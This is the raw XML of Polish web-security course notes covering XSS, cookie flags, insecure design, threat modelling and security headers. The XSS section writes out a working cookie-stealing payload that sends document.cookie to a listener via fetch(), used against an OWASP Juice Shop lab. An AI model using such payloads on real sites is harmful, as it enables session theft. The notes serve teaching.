    <w:p w14:paraId="3581283E" w14:textId="36456853" w:rsidR="00261767" w:rsidRDefault="00261767" w:rsidP="00261767">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>XSS od strony teoretycznej</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBFF9E7" w14:textId="690D618B" w:rsidR="00261767" w:rsidRDefault="003B177F" w:rsidP="00261767">
      <w:r w:rsidRPr="003B177F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67AB3210" wp14:editId="05715D1A">
            <wp:extent cx="5760720" cy="1027430"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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0D0E" w14:textId="19E805C6" w:rsidR="003B177F" w:rsidRDefault="00A05140" w:rsidP="00261767">
      <w:r w:rsidRPr="00A05140">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39C7FA36" wp14:editId="58BB0628">
            <wp:extent cx="3364523" cy="1098143"/>
            <wp:effectExtent l="0" t="0" r="7620" b="698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344" cy="11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D37" w14:textId="1790B0E8" w:rsidR="00A05140" w:rsidRDefault="00C6083A" w:rsidP="00261767">
      <w:r w:rsidRPr="00C6083A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C409C2A" wp14:editId="63C855CE">
            <wp:extent cx="5760720" cy="3251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6B6E" w14:textId="2ABDF315" w:rsidR="00C6083A" w:rsidRDefault="001736D6" w:rsidP="00261767">
      <w:r w:rsidRPr="001736D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="506AC329" wp14:editId="28A3B0AF">
            <wp:extent cx="4149969" cy="1205833"/>
            <wp:effectExtent l="0" t="0" r="3175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0275" cy="12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275F" w14:textId="6EFADA7B" w:rsidR="001736D6" w:rsidRDefault="00FF30E6" w:rsidP="00261767">
      <w:r w:rsidRPr="00FF30E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="089E04C4" wp14:editId="5C740016">
            <wp:extent cx="3815861" cy="1377109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556" cy="13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46A" w14:textId="02A3E67A" w:rsidR="00FE1FF3" w:rsidRDefault="009D7D79" w:rsidP="00261767">
      <w:r>
        <w:t>Jak znaleźć XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD9555" w14:textId="1155276C" w:rsidR="009D7D79" w:rsidRDefault="009D7D79" w:rsidP="00261767">
      <w:r w:rsidRPr="009D7D79">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40289263" wp14:editId="3F0CAF70">
            <wp:extent cx="5180428" cy="1780487"/>
            <wp:effectExtent l="0" t="0" r="127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628" cy="17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17AE" w14:textId="60F35A94" w:rsidR="009D7D79" w:rsidRDefault="00035BED" w:rsidP="00261767">
      <w:r>
        <w:t>Jaka różnica między walidacją, a sanityzacją</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E6C73D" w14:textId="2CE0399F" w:rsidR="00864885" w:rsidRDefault="00864885" w:rsidP="00261767">
      <w:r w:rsidRPr="00864885">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BE744B0" wp14:editId="5CEF4A91">
            <wp:extent cx="4974964" cy="1298031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743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6347" w14:textId="43BFF198" w:rsidR="00864885" w:rsidRDefault="00864885" w:rsidP="00261767">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zablokuje dostęp do ciasteczka poprzez </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58F9F548" w14:textId="7F6292AB" w:rsidR="00864885" w:rsidRDefault="00864885" w:rsidP="00261767">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Secure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> powstrzyma wysyłanie ciastek via http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2D99D1" w14:textId="22E2E87D" w:rsidR="00261767" w:rsidRDefault="00261767" w:rsidP="00261767">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS od strony praktycznej</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FDC784" w14:textId="4B3A6B01" w:rsidR="00261767" w:rsidRDefault="00000000" w:rsidP="00261767">
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="002C5A88" w:rsidRPr="00C279D3">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6341360C" w14:textId="06E80BCD" w:rsidR="002C5A88" w:rsidRDefault="00000000" w:rsidP="00261767">
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="002C5A88" w:rsidRPr="00C279D3">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E61A51D" w14:textId="37019AAB" w:rsidR="003B2449" w:rsidRDefault="00547EC1" w:rsidP="00261767">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marquee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53976045" w14:textId="1DA6A55E" w:rsidR="003C4D53" w:rsidRDefault="003C4D53" w:rsidP="00261767">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;alert(1)&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D22C544" w14:textId="561B46DB" w:rsidR="00110EC7" w:rsidRDefault="00110EC7" w:rsidP="00261767">
      <w:r>
        <w:t xml:space="preserve">Automatyzacja </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00110EC7">
        <w:t>PayloadsAllTheThings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00110EC7">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA655CE" w14:textId="1116EEFF" w:rsidR="00642546" w:rsidRDefault="00B451F0" w:rsidP="00261767">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00110EC7">
        <w:t>ntruders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Polyglots</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6308F2D8" w14:textId="7E3716B0" w:rsidR="00297CDE" w:rsidRDefault="00297CDE" w:rsidP="00261767">
      <w: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>=</w:t>
      </w:r>
      <w:r w:rsidR="00F34F46">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=’1’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1)’&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE354A" w14:textId="39253256" w:rsidR="00D75AE6" w:rsidRDefault="00D75AE6" w:rsidP="00261767">
      <w:r>
        <w:t xml:space="preserve">W </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>juice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shop podatność </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to dom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xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i tego nie jest tak łatwo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>przefuzzować</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ma jedynie taką funkcjonalność</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313412EC" w14:textId="23DC176E" w:rsidR="00261767" w:rsidRDefault="00261767" w:rsidP="00261767">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>XSS w ataku krok po kroku</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1147961E" w14:textId="0256B95F" w:rsidR="00DA51DB" w:rsidRDefault="00DA51DB" w:rsidP="00261767">
      <w:r>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C06E48" w14:textId="54BD8B21" w:rsidR="00261767" w:rsidRDefault="00DA51DB" w:rsidP="00261767">
      <w:r>
        <w:t xml:space="preserve">- Python2 – m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449FD430" w14:textId="2FB2377B" w:rsidR="00687181" w:rsidRDefault="00DA51DB" w:rsidP="00261767">
      <w:r>
        <w:t xml:space="preserve">-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lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18942F87" w14:textId="6C4A0DA0" w:rsidR="00DA51DB" w:rsidRDefault="009B6E1A" w:rsidP="00261767">
      <w:r w:rsidRPr="009B6E1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22801BBB" wp14:editId="5765DA42">
            <wp:extent cx="5760720" cy="3470910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9AC0" w14:textId="141223C8" w:rsidR="008F02F0" w:rsidRDefault="008F02F0" w:rsidP="00261767">
      <w:r>
        <w:t>Komentarz: dodany skrypt jest bez komentarza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F36DA0" w14:textId="16622631" w:rsidR="00857EDD" w:rsidRDefault="00517393" w:rsidP="00261767">
      <w:r w:rsidRPr="00517393">
        <w:t>http://192.168.1.6:3000/#/search?q=</w:t>
      </w:r>
      <w:r w:rsidR="00857EDD">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t xml:space="preserve">iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>width</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t xml:space="preserve">='1' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>height</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t xml:space="preserve">='1' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>javascript:var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>='http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00517393">
        <w:t xml:space="preserve"> 192.168.1.6</w:t>
      </w:r>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>:9000?';</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>url.concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>fetch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00857EDD" w:rsidRPr="009B4404">
        <w:t>);"</w:t>
      </w:r>
      <w:r w:rsidR="00857EDD">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5FD801" w14:textId="4F43B4AF" w:rsidR="000C43D5" w:rsidRDefault="000C43D5" w:rsidP="00261767">
      <w:r w:rsidRPr="00517393">
        <w:t>http://192.168.1.6:3000/#/search?q=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C43D5">
        <w:t xml:space="preserve">&lt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C43D5">
        <w:t>width</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C43D5">
        <w:t xml:space="preserve">='1' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C43D5">
        <w:t>height</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C43D5">
        <w:t xml:space="preserve">='1' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C43D5">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C43D5">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C43D5">
        <w:t>javascript:var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C43D5">
        <w:t xml:space="preserve"> url='http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00517393">
        <w:t>192.168.1.6</w:t>
      </w:r>
      <w:r w:rsidRPr="000C43D5">
        <w:t>:9000?';url=url.concat(document.cookie);fetch(url);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450E0BC8" w14:textId="0AAC8551" w:rsidR="00A16961" w:rsidRDefault="00A16961" w:rsidP="00A16961">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Podatności wynikające z logiki aplikacji</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1783279B" w14:textId="2FA84547" w:rsidR="00A16961" w:rsidRDefault="00A16961" w:rsidP="00A16961">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Insecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Design, czyli Top 10 A4-2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576827E" w14:textId="078F93BD" w:rsidR="00A16961" w:rsidRDefault="00DE7CC4" w:rsidP="00A16961">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Abuser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z punktu widzenia atakującego</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2370A9" w14:textId="0451D46D" w:rsidR="009D4269" w:rsidRDefault="009D4269" w:rsidP="00A16961">
      <w:r w:rsidRPr="009D4269">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="524F0D5F" wp14:editId="2D6EF012">
            <wp:extent cx="2901461" cy="1845056"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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525" cy="18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21C8" w14:textId="3BB968F9" w:rsidR="00A16961" w:rsidRDefault="00A16961" w:rsidP="00A16961">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Demonstracja podatności w aplikacji testowej</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7ED734" w14:textId="68CF8DCF" w:rsidR="008D6561" w:rsidRDefault="008D6561" w:rsidP="00A16961">
      <w:r>
        <w:t>Mechanizm przypominania hasła oparty o pytanie pomocnicze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3369E1EB" w14:textId="098469FF" w:rsidR="00A16961" w:rsidRDefault="00A16961" w:rsidP="00A16961">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Omówienie dodatkowych przypadków</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F05116" w14:textId="7B63674B" w:rsidR="001B2160" w:rsidRDefault="00653AB1" w:rsidP="00A16961">
      <w:r>
        <w:t>- aplikacja pozwala na enumerację użytkowników</w:t>
      </w:r>
      <w:r w:rsidR="00685D2D">
        <w:t xml:space="preserve">, dla istniejącego użytkownika aplikacja zwraca pytanie pomocnicze, dla nieistniejącego aplikacja zwraca </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00685D2D">
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1640F36F" w14:textId="4BE6B9B6" w:rsidR="00685D2D" w:rsidRDefault="00BD0F0A" w:rsidP="00A16961">
      <w:r>
        <w:t>NIST 863b</w:t>
      </w:r>
      <w:r w:rsidR="003306BF">
        <w:t xml:space="preserve"> – taki ASVS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F4E96" w14:textId="7DC99414" w:rsidR="00B632B3" w:rsidRDefault="00806ACF" w:rsidP="00A16961">
      <w:r>
        <w:t>- systemy nie powinny narzucać złożoności hasła</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E38C9B" w14:textId="31AADC93" w:rsidR="00A16961" w:rsidRDefault="00A16961" w:rsidP="00A16961">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Pryncypia bezpiecznej architektury</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCD171" w14:textId="1ACF7F82" w:rsidR="00A16961" w:rsidRDefault="009C68EE" w:rsidP="00A16961">
      <w:r w:rsidRPr="009C68EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299D0882" wp14:editId="72D2C4A9">
            <wp:extent cx="3393831" cy="906254"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255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8472" cy="9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584C" w14:textId="4D3EE83B" w:rsidR="006079AE" w:rsidRDefault="00AC2971" w:rsidP="00A16961">
      <w:r w:rsidRPr="00AC2971">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC34F4D" wp14:editId="5AB7838F">
            <wp:extent cx="2010508" cy="236531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9483" cy="2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CC4" w14:textId="15A1A694" w:rsidR="00AC2971" w:rsidRDefault="00A33A7C" w:rsidP="00A16961">
      <w:r w:rsidRPr="00A33A7C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6641465C" wp14:editId="1C481D88">
            <wp:extent cx="2703342" cy="660026"/>
            <wp:effectExtent l="0" t="0" r="1905" b="698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6" cy="6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9C5" w14:textId="77C2B718" w:rsidR="00A33A7C" w:rsidRDefault="000E618C" w:rsidP="00A16961">
      <w:r w:rsidRPr="000E618C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03F7108E" wp14:editId="63B36C39">
            <wp:extent cx="3452446" cy="792286"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255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6071" cy="7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F17" w14:textId="11F3E39D" w:rsidR="00A16961" w:rsidRPr="00A16961" w:rsidRDefault="00A16961" w:rsidP="003F0665">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Modelowanie zagrożeń</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF7EF5" w14:textId="441827F9" w:rsidR="00261767" w:rsidRDefault="000E618C" w:rsidP="00827563">
      <w:r>
        <w:t>Co tworzymy?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A393E5D" w14:textId="4D25F440" w:rsidR="000E618C" w:rsidRDefault="000E618C" w:rsidP="00827563">
      <w:r>
        <w:t>Co może pójść źle?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140BD0DD" w14:textId="2135B8CC" w:rsidR="000E618C" w:rsidRDefault="000E618C" w:rsidP="00827563">
      <w:r w:rsidRPr="000E618C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52840BCE" wp14:editId="51902058">
            <wp:extent cx="773723" cy="449036"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8255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6756" cy="4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2202" w14:textId="3337E1C7" w:rsidR="000E618C" w:rsidRDefault="000E618C" w:rsidP="00827563">
      <w:r>
        <w:t>Co z tym zrobimy?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66655238" w14:textId="1926A079" w:rsidR="002D726D" w:rsidRDefault="000E618C" w:rsidP="00827563">
      <w:r w:rsidRPr="000E618C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10A6017C" wp14:editId="7540AC7B">
            <wp:extent cx="1149447" cy="434319"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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7382" cy="4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A2E" w14:textId="11FA9B45" w:rsidR="002D726D" w:rsidRDefault="00160062" w:rsidP="00160062">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Moduł 8 Podatności wynikające z konfiguracji</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56236BC0" w14:textId="57C2E196" w:rsidR="00160062" w:rsidRDefault="00160062" w:rsidP="00160062">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r w:rsidRPr="00160062">
        <w:t xml:space="preserve">Lekcja 2: Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00160062">
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00160062">
        <w:t>, czyli Top 10 A5-2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A551D78" w14:textId="18A74374" w:rsidR="00160062" w:rsidRDefault="00D603E0" w:rsidP="00160062">
      <w:r w:rsidRPr="00D603E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63D378C1" wp14:editId="152BD778">
            <wp:extent cx="5760720" cy="2021840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EBE7" w14:textId="173BDE42" w:rsidR="00160062" w:rsidRDefault="00160062" w:rsidP="00160062">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r w:rsidRPr="00160062">
        <w:t>Lekcja 3: Nagłówki bezpieczeństwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA4AA3" w14:textId="0EC60C04" w:rsidR="00160062" w:rsidRDefault="00000000" w:rsidP="00160062">
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="0005778C" w:rsidRPr="00FD714A">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://github.com/Santandersecurityresearch/DrHeader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0005778C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC7B344" w14:textId="442369CC" w:rsidR="0005778C" w:rsidRDefault="00000000" w:rsidP="00160062">
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="0005778C" w:rsidRPr="00FD714A">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://infosec.mozilla.org/guidelines/web_security.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0005778C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E8E07" w14:textId="472A8F37" w:rsidR="0005778C" w:rsidRDefault="00000000" w:rsidP="00160062">
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="0005778C" w:rsidRPr="00FD714A">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://securityheaders.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0005778C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF23DDD" w14:textId="69BD1518" w:rsidR="00160062" w:rsidRDefault="00160062" w:rsidP="00160062">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r w:rsidRPr="00160062">
        <w:t xml:space="preserve">Lekcja 4: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00160062">
        <w:t>Strict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00160062">
        <w:t>-Transport-Security (HSTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DF19B4" w14:textId="78CFE37B" w:rsidR="00160062" w:rsidRDefault="00884D91" w:rsidP="00160062">
      <w:r w:rsidRPr="00884D91">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
